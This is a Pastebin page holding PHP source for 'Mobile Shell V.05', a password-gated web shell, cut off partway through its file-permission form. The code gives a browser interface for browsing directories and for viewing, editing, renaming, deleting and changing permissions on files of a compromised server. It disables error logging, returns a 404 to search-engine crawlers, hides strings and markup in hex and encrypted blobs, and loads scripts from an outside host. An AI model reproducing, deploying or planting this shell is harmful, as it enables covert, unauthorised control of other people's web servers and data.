WILDAN_IZZUDIN

MOBILE SHELL V.05 (4TH EDITION) [WITHOUT PRELOADER]

Dec 4th, 2017
535
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*! Description & About
  3.         * Mobile Shell V.05 (4th Edition)
  4.         * Responsive Version
  5.         * Source Viewer With Syntax Highligting
  6.         * Simple Dark Alert
  7.         * Without Log's
  8.         * Clean Url
  9.         * Programmed By Wildan Izzudin
  10.         * Web Shell (c) 2017
  11.         * Underxploit Production (Knowlage Is Jembut)
  12.         * Fix On 03, Dec 2017 (Sunday)
  13. End !*/
  14. error_reporting(0);
  15. // --- pass : underxploit ---//
  16. $pass = "0bdec2f837ad15748be105faaf60db68";
  17. $cookie = md5($_SERVER['HTTP_USER_AGENT']);
  18. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."-underxploit"])) {
  19. vb(md5($_SERVER['HTTP_HOST'])."underxploit", $cookie);
  20. }
  21. function vb($k, $v) {
  22.     $_COOKIE[$k] = $v;
  23.     setcookie($k, $v);
  24. }
  25. $_POST = cl($_POST);
  26. $_GET = cl($_GET);
  27. $_COOKIE = cl($_COOKIE);
  28. $_COEG = array_merge($_POST, $_GET);
  29. $_COEG = array_map("xp", $_COEG);
  30. if(isset($_COEG['dir'])) {
  31.         $dir = str_replace("\\", "/", $_COEG['dir']);
  32.         @chdir($dir);
  33.     } else {
  34.         $dir = str_replace("\\", "/", getcwd());
  35. }
  36. $dir= str_replace("\\","/", $dir);
  37. $scdir = explode("/", $dir);        
  38. function cl($arr){
  39.     $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
  40. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
  41.         if(is_array($arr)){
  42.             foreach($arr as $k=>$v){
  43.                 if(is_array($v)) $arr[$k] = cl($v);
  44.                 else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
  45.             }
  46.         }
  47.     }
  48.     return $arr;
  49. }
  50. function xp($str){
  51.     return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
  52. }
  53. function r($r) {
  54.     echo('<script>window.location = "'.$r.'";</script>');
  55. }
  56. function failed1($a) {
  57. echo '<script type="text/javascript">
  58.     $.alert({
  59.     icon: "fa fa-code",
  60.     title: "MOBILE SHELL",
  61.     theme: "Dark",
  62.     content: "'.$a.'",
  63.     type: "red",
  64.     }); </script>';
  65. }
  66. function failed2($a) {
  67.     echo '$.alert({
  68.     icon: "fa fa-code",
  69.     title: "MOBILE SHELL",
  70.     theme: "Dark",
  71.     content: "'.$a.'",
  72.     type: "red",
  73.     });';
  74. }
  75. function success1($a) {
  76. echo '<script type="text/javascript">
  77.     $.alert({
  78.     icon: "fa fa-code",
  79.     title: "MOBILE SHELL",
  80.     theme: "Dark",
  81.     content: "'.$a.'",
  82.     type: "green",
  83.     }); </script>';
  84. }
  85. function success2($a) {
  86. echo '$.alert({
  87.     icon: "fa fa-code",
  88.     title: "MOBILE SHELL",
  89.     theme: "Dark",
  90.     type: "green",
  91.     content: "'.$a.'",
  92.     });';
  93. }
  94. function fauto1($alert, $window) {
  95.     echo '<script type="text/javascript">
  96.     $.alert({
  97.     icon: "fa fa-code",
  98.     title: "MOBILE SHELL",
  99.     theme: "Dark",
  100.     content: "'.$alert.'",
  101.     type: "red",
  102.          buttons: {
  103.             OK: {  
  104.         action: function() {
  105.         window.location = "'.$window.'";
  106.         },
  107.     },
  108. },
  109.     }); </script>';
  110. }
  111. function fauto2($alert, $window) {
  112.     echo '<script type="text/javascript">
  113.     $.alert({
  114.     icon: "fa fa-code",
  115.     title: "MOBILE SHELL",
  116.     theme: "Dark",
  117.     content: "'.$alert.'",
  118.     type: "green",
  119.          buttons: {
  120.             OK: {  
  121.         action: function() {
  122.         window.location = "'.$window.'";
  123.         },
  124.     },
  125. },
  126.     }); </script>';
  127. }
  128. function deledir($dirname) {
  129.          if (is_dir($dirname))
  130.            $dir_handle = opendir($dirname);
  131.      if (!$dir_handle)
  132.           return false;
  133.      while($file = readdir($dir_handle)) {
  134.            if ($file != "." && $file != "..") {
  135.                 if (!is_dir($dirname."/".$file))
  136.                      unlink($dirname."/".$file);
  137.                 else
  138.                      deledir($dirname.'/'.$file);
  139.            }
  140.      }
  141.      closedir($dir_handle);
  142.      rmdir($dirname);
  143.      return true;
  144. }
  145. function a($x17) {
  146. @define("x13", "\x31\x33\x33\x37", true);
  147. $x14 = base64_decode($x17);
  148. $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
  149. $x19 = rtrim(
  150.     mcrypt_decrypt(
  151.         MCRYPT_RIJNDAEL_128,
  152.         hash('sha256', x13, true),
  153.         substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
  154. return $x19;
  155. }
  156. function x($b) {
  157.     $c = a($b);
  158. return $c;
  159. }
  160. @session_start();
  161. @error_reporting(0);
  162. @ini_set('error_log',NULL);
  163. @ini_set('log_errors',0);
  164. @ini_set('html_errors',0);
  165. @ini_set('max_execution_time',0);
  166. @ini_set('output_buffering',0);
  167. @ini_set('file_uploads',1);
  168. @set_time_limit(0);
  169. @clearstatcache();
  170. @define("sec", $pass, true);
  171. @define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x63\x64\x6e\x73\x2e\x78\x74\x67\x65\x6d\x2e\x63\x6f\x6d\x2f\x63\x6f\x64\x65", true);
  172. if(get_magic_quotes_gpc()) {
  173.     function stripslashes_array($array) {
  174.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  175. }
  176.     $_COEG = stripslashes_array($_COEG);
  177.     $_COOKIE = stripslashes_array($_COOKIE);
  178. }
  179. if(!empty(sec)) {
  180.     if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec))         vb(md5($_SERVER['HTTP_HOST']), sec);
  181. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != sec))
  182.         login();
  183. } else { echo '<script>alert("d")</script>'; }
  184. function login() {
  185. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  186.         $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  187.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  188.           header('HTTP/1.0 404 Not Found');
  189.           exit;
  190.      }
  191.  } die('<!DOCTYPE html><html><head>
  192. <title>LOGIN | MOBILE SHELL V.05</title>
  193.     <meta name="robots" content="noindex, nofollow, noarchive">
  194.     <meta name="viewport" content="width=device-width, initial-scale=1">
  195.     <link rel="icon" href="'.x4.'/favicon.ico" type="image/x-icon" />
  196.     <meta property="og:image" content="https://1.bp.blogspot.com/-BcG4JeX2z6Q/WVYTMixgLvI/AAAAAAAAAmk/PBjmcF02SWgoiP-KcxvWq6QVDV2DACi0QCLcBGAs/s320/PicsArt_06-30-03.52.49.jpg">
  197.     <meta name="theme-color" content="#222">
  198.     <meta name="apple-mobile-web-app-capable" content="yes">
  199.     <meta name="apple-mobile-web-app-status-bar-style" content="#222">
  200.     <meta name="msapplication-navbutton-color" content="#222">
  201.     <meta name="author" content="WILDAN IZZUDIN">
  202. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  203. <script src="'.x4.'/bundled.js"></script>
  204.     <script type="text/javascript" src="'.x4.'/jquery-confirm.js"></script>
  205.     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
  206. "/>
  207.     <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Iceland"/>
  208.     <link rel="stylesheet" href="'.x4.'/style.css"/>
  209.     <link rel="stylesheet" href="'.x4.'/jquery.min.css"/>
  210.     <link rel="stylesheet" type="text/css" href="'.x4.'/jquery-confirm.css"/>
  211. <script>
  212.    baseUrl = window.location.href.split("?")[0];
  213.    window.history.pushState("name", "?", baseUrl);</script>
  214. </head><body>
  215. <div class="login-kepala">
  216. <div class="login-container">
  217.     <script>function login(){
  218. if(document.getElementById("password").value == ""){
  219.      $.alert ({
  220.         icon: "fa fa-code",
  221.         title: "MOBILE SHELL",
  222.         content: "You Know Password For This Shell ??",
  223.         theme: "Dark",
  224.     buttons: {
  225.         YES: {
  226.             action: function() {
  227.         $.alert ({
  228.         icon: "fa fa-code",
  229.         title: "MOBILE SHELL",
  230.         content: "Please Enter Your Password !!",
  231.         theme: "Dark",
  232.             });
  233.         },
  234.     },
  235.    
  236. NO: {
  237.             action: function() {
  238.         $.alert ({
  239.         icon: "fa fa-code",
  240.         title: "MOBILE SHELL",
  241.         content: "You Are Motherfuck\'n Tolol !!",
  242.         theme: "Dark",
  243.             });
  244.         },  
  245.    },  
  246. },
  247.  
  248.     });
  249.      return false;
  250.    }
  251.    document.getElementById("sks").submit();
  252.  }
  253. </script>
  254. <form action="" method="post">
  255. <table><td align="center" style="width:10%">
  256. <i class="fa fa-bug"></i></td>
  257. <td style="width:70%"><input type="password" name="pass" id="password" style="padding:7px">
  258. </td>
  259. <td style="text-align:right;width:20%"><button type="submit" class="btn-exe" onClick="login(); return false;"><i class="fa fa-sign-in"></i></button></td></table></form></div></div>
  260. </body></html>');
  261. } ?>
  262. <?php
  263. define("x1", "\x4d\x4f\x42\x49\x4c\x45\x20\x53\x48\x45\x4c\x4c", true);
  264. define("x2", "\x56\x2e\x30\x35", true);
  265. define("x3", "\x57\x49\x4c\x44\x41\x4e\x20\x49\x5a\x5a\x55\x44\x49\x4e", true);
  266. define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x63\x64\x6e\x73\x2e\x78\x74\x67\x65\x6d\x2e\x63\x6f\x6d\x2f\x63\x6f\x64\x65", true);
  267. define("x5", "\x64\x69\x72\x3d", true);
  268. define("x6", "\x66\x69\x6c\x65\x3d", true);
  269. define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
  270. define("x8", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x74\x61\x62\x6c\x65\x3e\x0d\x0a\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x63\x6f\x64\x65\x27\x3e\x3c\x2f\x69\x3e\x3c\x2f\x74\x64\x3e\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x2d\x72\x69\x67\x68\x74\x27\x3e\x45\x52\x52\x4f\x52\x3c\x2f\x74\x64\x3e\x3c\x2f\x74\x61\x62\x6c\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
  271. define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
  272. define("x10", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x74\x61\x62\x6c\x65\x3e\x0d\x0a\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x63\x6f\x64\x65\x27\x3e\x3c\x2f\x69\x3e\x3c\x2f\x74\x64\x3e\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x2d\x72\x69\x67\x68\x74\x27\x3e\x53\x55\x43\x43\x45\x53\x53\x3c\x2f\x74\x64\x3e\x3c\x2f\x74\x61\x62\x6c\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x52\x45\x51\x55\x45\x53\x54\x20\x4f\x4b\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
  273. define("x11", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x52\x45\x51\x55\x45\x53\x54\x20\x4f\x4b\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
  274. error_reporting(0);
  275. error_log(0);
  276. @ini_set('error_log',NULL);
  277. @ini_set('log_errors',0);
  278. @ini_set('max_execution_time',0);
  279. @set_time_limit(0);
  280.    echo('<!DOCTYPE HTML>
  281. <html lang="id">
  282. <head><title>'.x1.' '.x2.'</title>
  283. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
  284. <meta name="theme-color" content="#222">
  285. <link rel="icon" href="'.x4.'/favicon.ico" type="image/x-icon" />');
  286. echo('<script>
  287.    baseUrl = window.location.href.split("?")[0];
  288.    window.history.pushState("name", "?", baseUrl);</script>');
  289.    
  290. echo('<script src="'.x4.'/bundled.js"></script>
  291.     <script type="text/javascript" src="'.x4.'/jquery-confirm.js"></script>
  292.     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
  293. "/>
  294.     <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Iceland"/>
  295.     <link rel="stylesheet" href="'.x4.'/style.css"/>
  296.     <link rel="stylesheet" href="'.x4.'/jquery.min.css"/>
  297.     <link rel="stylesheet" type="text/css" href="'.x4.'/jquery-confirm.css"/>');
  298. echo(x("\x61\x32\x6d\x6a\x70\x46\x67\x59\x75\x67\x49\x75\x4b\x41\x66\x68\x43\x50\x45\x45\x37\x59\x5a\x66\x51\x76\x4f\x32\x32\x5a\x4e\x31\x69\x56\x4d\x67\x4f\x2f\x6a\x47\x6b\x57\x54\x6a\x43\x65\x48\x46\x51\x79\x4d\x49\x72\x6c\x34\x34\x79\x4f\x76\x4f\x4a\x6b\x79\x4e\x79\x38\x6e\x4c\x6c\x48\x37\x2b\x6f\x48\x76\x6a\x78\x63\x34\x65\x51\x58\x2b\x68\x7a\x45\x50\x39\x7a\x6c\x6f\x76\x56\x42\x73\x7a\x6d\x45\x2b\x71\x6f\x4d\x52\x35\x44\x4c\x6a\x4f\x56\x73\x6f\x39\x48\x75\x4f\x54\x4a\x35\x6e\x37\x4e\x49\x4a\x73\x46\x37\x6f\x69\x38\x74\x4e\x5a\x42\x57\x41\x67\x6e\x4b\x4f\x66\x4c\x53\x43\x61\x4e\x77\x6d\x48\x2f\x43\x55\x66\x2b\x59\x64\x43\x2f\x6a\x58\x31\x64\x78\x68\x38\x33\x54\x41\x52\x61\x31\x62\x62\x75\x39\x2b\x38\x68\x2f\x79\x51\x77\x45\x68\x76\x59\x37\x43\x39\x6a\x64\x6f\x47\x32\x59\x4c\x59\x57\x74\x6f\x6c\x4a\x39\x54\x42\x65\x61\x31\x32\x38\x6d\x33\x4c\x4e\x36\x54\x64\x79\x6f\x57\x6d\x53\x77\x6b\x78\x42\x47\x38\x68\x79\x6d\x66\x36\x6e\x35\x6a\x62\x4a\x69\x34\x74\x46\x50\x6a\x4a\x68\x42\x77\x49\x6b\x45\x38\x30\x4c\x61\x4b\x7a\x6c\x42\x37\x4b\x68\x50\x5a\x4d\x5a\x59\x58\x6c\x75\x6c\x6b\x32\x57\x50\x44\x2f\x76\x4e\x4e\x4b\x37\x77\x51\x6b\x70\x62\x59\x65\x66\x6c\x44\x35\x49\x6c\x49\x54\x57\x72\x55\x3d"));
  299. echo('<i class="fa fa-chevron-up move-top"></i>');
  300. echo('<script>
  301. jQuery(document).ready(function() {
  302.    var offset = 220;
  303.    var duration = 500;
  304.    jQuery(window).scroll(function() {
  305.        if (jQuery(this).scrollTop() > offset) {
  306.            jQuery(\'.move-top\').fadeIn(duration);
  307.        } else {
  308.            jQuery(\'.move-top\').fadeOut(duration);
  309.        }
  310.    });
  311.    jQuery(\'.move-top\').click(function(event) {
  312.        event.preventDefault();
  313.        jQuery(\'html, body\').animate({scrollTop: 0}, duration);
  314.        return false;
  315.    })
  316. });
  317. </script>');
  318. echo(x("\x78\x4a\x59\x63\x6f\x52\x6a\x66\x50\x62\x37\x79\x58\x51\x34\x4f\x43\x6a\x6d\x75\x76\x4a\x41\x44\x59\x63\x34\x78\x37\x6b\x65\x49\x30\x58\x4e\x70\x33\x31\x56\x78\x34\x72\x52\x4c\x69\x68\x4b\x50\x64\x4d\x64\x37\x62\x6f\x4f\x39\x71\x42\x47\x4b\x78\x50\x63\x58\x4a\x2f\x6c\x71\x44\x2b\x75\x6d\x63\x76\x6e\x6b\x65\x4a\x55\x50\x4d\x4b\x43\x48\x74\x61\x59\x49\x4c\x51\x77\x45\x6f\x46\x52\x32\x4c\x46\x4b\x6d\x63\x69\x48\x57\x69\x58\x76\x55\x30\x69\x4d\x76\x44\x43\x73\x57\x32\x76\x4d\x7a\x66\x45\x4a\x76\x74\x33\x43\x6b\x71\x68\x6d\x31\x74\x6a\x70\x6a\x76\x43\x61\x34\x2b\x51\x62\x6f\x76\x76\x2b\x2b\x33\x55\x65\x46\x55\x62\x4b\x4d\x69\x55\x4f\x6d\x53\x4b\x53\x69\x6d\x4d\x6a\x41\x6c\x35\x34\x79\x56\x42\x62\x69\x45\x63\x61\x75\x39\x38\x4a\x4a\x30\x49\x54\x45\x33\x65\x41\x49\x61\x71\x7a\x33\x4a\x57\x6a\x53\x65\x67\x42\x6c\x71\x47\x33\x52\x75\x4a\x35\x46\x70\x42\x5a\x35\x36\x34\x6f\x43\x4b\x55\x56\x54\x70\x44\x42\x70\x49\x39\x49\x5a\x39\x73\x2b\x61\x56\x72\x56\x47\x4d\x2b\x6c\x61\x4c\x4f\x71\x30\x6a\x48\x34\x44\x73\x30\x77\x48\x30\x41\x4a\x68\x41\x46\x2b\x44\x45\x71\x33\x46\x6d\x36\x5a\x42\x75\x6e\x70\x67\x69\x35\x42\x30\x5a\x4e\x51\x36\x31\x6a\x39\x71\x74\x75\x57\x49\x64\x2f\x2b\x74\x75\x73\x53\x7a\x6e\x5a\x65\x33\x50\x6a\x4b\x30\x51\x58\x6b\x48\x4c\x35\x67\x35\x5a\x38\x65\x4d\x65\x4f\x31\x58\x59\x54\x56\x6b\x43\x64\x78\x65\x67\x2b\x70\x69\x54\x44\x5a\x47\x30\x41\x77\x6b\x44\x32\x2f\x6d\x4e\x58\x6a\x50\x6e\x62\x55\x58\x4d\x67\x74\x61\x4f\x35\x57\x34\x77\x42\x73\x59\x6c\x34\x69\x6c\x55\x42\x77\x78\x6d\x30\x77\x73\x44\x38\x78\x32\x73\x4c\x35\x45\x54\x6b\x67\x48\x41\x48\x5a\x71\x48\x2b\x63\x42\x48\x75\x4e\x65\x4a\x44\x48\x57\x4f\x61\x38\x71\x4b\x41\x6f\x55\x64\x4c\x52\x77\x64\x78\x68\x48\x52\x79\x43\x77\x71\x44\x36\x71\x53\x6c\x32\x59\x4e\x75\x57\x39\x2b\x36\x41\x79\x7a\x61\x76\x6a\x31\x59\x4d\x57\x67\x35\x33\x73\x31\x6b\x68\x30\x4b\x71\x4e\x35\x79\x54\x64\x38\x43\x62\x78\x45\x55\x58\x48\x38\x48\x49\x76\x66\x35\x6c\x46\x59\x35\x76\x71\x63\x64\x74\x39\x55\x4e\x4e\x66\x72\x66\x30\x57\x5a\x42\x78\x39\x4e\x38\x6b\x78\x67\x38\x75\x79\x71\x78\x52\x36\x37\x59\x6b\x4b\x43\x61\x38\x31\x4f\x71\x68\x4d\x7a\x37\x37\x4d\x4b\x65\x6e\x35\x62\x4a\x66\x58\x42\x48\x63\x54\x51\x41\x79\x6f\x56\x71\x72\x4d\x70\x50\x6f\x5a\x47\x55\x6d\x4d\x71\x42\x31\x6f\x6b\x6c\x78\x49\x47\x72\x72\x4a\x56\x56\x71\x31\x6a\x49\x4d\x70\x38\x46\x42\x41\x39\x76\x42\x4d\x37\x57\x76\x43\x75\x74\x63\x4b\x73\x6d\x6b\x77\x30\x57\x47\x68\x45\x52\x6d\x6f\x69\x6b\x45\x50\x4a\x39\x42\x2f\x74\x54\x6d\x54\x6b\x6b\x4a\x64\x76\x49\x31\x63\x65\x67\x74\x67\x39\x5a\x47\x32\x71\x53\x66\x31\x71\x2f\x2f\x68\x44\x59\x2b\x4d\x42\x49\x37\x50\x49\x47\x43\x69\x53\x6e\x58\x53\x79\x46\x67\x76\x67\x57\x78\x5a\x53\x64\x42\x43\x74\x37\x4c\x73\x66\x31\x34\x37\x55\x39\x4c\x72\x37\x56\x4b\x61\x61\x79\x47\x47\x47\x61\x6b\x63\x37\x78\x58\x75\x73\x55\x78\x6c\x42\x4f\x36\x2f\x4d\x66\x76\x69\x2f\x65\x53\x69\x64\x52\x49\x6f\x77\x72\x65\x6c\x47\x73\x76\x4b\x62\x72\x43\x54\x30\x71\x34\x58\x49\x36\x69\x7a\x72\x6a\x31\x66\x62\x31\x76\x31\x78\x55\x61\x32\x67\x4b\x32\x47\x4b\x67\x54\x70\x39\x45\x4f\x35\x30\x52\x50\x77\x52\x41\x61\x75\x58\x62\x78\x75\x52\x4b\x44\x38\x6d\x51\x39\x41\x55\x6e\x6f\x63\x31\x46\x4f\x76\x5a\x6d\x6b\x4c\x56\x39\x77\x62\x65\x47\x39\x4b\x6e\x46\x32\x4a\x6d\x72\x47\x4f\x39\x6c\x31\x35\x44\x52\x65\x76\x52\x55\x4f\x6f\x61\x6a\x61\x7a\x65\x5a\x33\x68\x54\x45\x6f\x48\x77\x52\x38\x5a\x4e\x4a\x4d\x65\x66\x73\x57\x4e\x57\x76\x37\x6c\x45\x2b\x50\x37\x44\x55\x73\x65\x61\x41\x76\x36\x2f\x54\x68\x41\x62\x37\x51\x73\x4e\x57\x49\x44\x41\x58\x79\x51\x39\x68\x51\x62\x2f\x7a\x35\x68\x34\x5a\x4f\x64\x56\x44\x51\x31\x34\x58\x32\x42\x47\x41\x30\x77\x70\x49\x53\x37\x49\x68\x50\x71\x47\x4b\x4f\x45\x6f\x6b\x4d\x4f\x61\x7a\x45\x35\x46\x37\x6e\x63\x32\x41\x78\x39\x58\x79\x4b\x51\x61\x68\x73\x43\x74\x6b\x50\x43\x65\x65\x32\x4c\x65\x44\x6b\x55\x7a\x4d\x75\x58\x65\x54\x72\x54\x75\x77\x32\x48\x6c\x70\x36\x52\x74\x45\x38\x4d\x58\x62\x6e\x66\x4d\x4c\x32\x79\x76\x69\x51\x3d\x3d"));
  319. echo('<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
  320. <script>hljs.initHighlightingOnLoad();</script>');
  321. echo('</head><body>');
  322. echo('<div class="kepala"><div class="co-ontainer"><table><td style="width:25px">
  323. <i class="fa fa-code"></td><td>
  324. '.x1.' '.x2.'</td><td style="text-align:right;width:50px"><i class="fa fa-navicon" onClick="ex(1000)"></i></td></table></div></div><div class="co-ontainer-2">
  325. <div class="cover">
  326. <table>
  327.     <th><a href="'.$_SERVER['PHP_SELF'].'"><button class="btn-nav">HOME</button></a></th>
  328.     <th><a href="?'.x5.getcwd().'&'.x7.'about"><button class="btn-nav">ABOUT</button></a></th>
  329.     <th><a href="?'.x5.'&'.x7.'logout"><button class="btn-nav">LOG\'T</button></a></th></table></div>');
  330. echo'<div class="dir">
  331. <table style="width:100%">
  332. <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><font color="#1D9D73">ROOT</font> :</td><td class="dir-td-right break wrap">';
  333. foreach($scdir as $c_dir => $cdir) {   
  334.     echo "<a class='a' href='?dir=";
  335.     for($i = 0; $i <= $c_dir; $i++) {
  336.         echo $scdir[$i];
  337.         if($i != $c_dir) {
  338.         echo "/";
  339.         }
  340.     }
  341.     echo "'>$cdir</a>/";
  342. }
  343. echo '</td></table></div></th></table></div>';
  344. $filez = basename($_COEG['file']);
  345. $size = filesize("$dir/$filez")/1024;
  346.             $size = round($size,3);
  347.             if($size > 1024) {
  348.                 $size = round($size/1024,2). ' MB';
  349.             } else {
  350.                 $size = $size. ' KB';
  351. }
  352. echo('<div class="coL">');
  353.  
  354. // --- chmod file --- //
  355. if($_COEG['command'] == 'chmod') {
  356. if(isset($_COEG['perm'])) {
  357. if(chmod($_COEG['file'],$_COEG['perm'])) {
  358. $q1 = 'Change Permission Done !!';
  359. $t1 = '?'.x7.'chmod&'.x5.$dir;
  360. success1($alert);
  361. } else {
  362. $q1 = 'Permission Denied !!';
  363. failed1($q1);
  364.     }
  365. }
  366. echo '<div class="coL-panel"><table>
  367. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
  368. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  369. <hr><table>';
  370. echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  371. <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  372. <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  373. <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
  374. <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  375. echo "<div class='coL-option top'>
  376. <br><br><br>
  377.     <center>
  378.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  379. echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  380. <table cellspacing='0'>
  381.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
  382. <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
  383. <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
  384.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
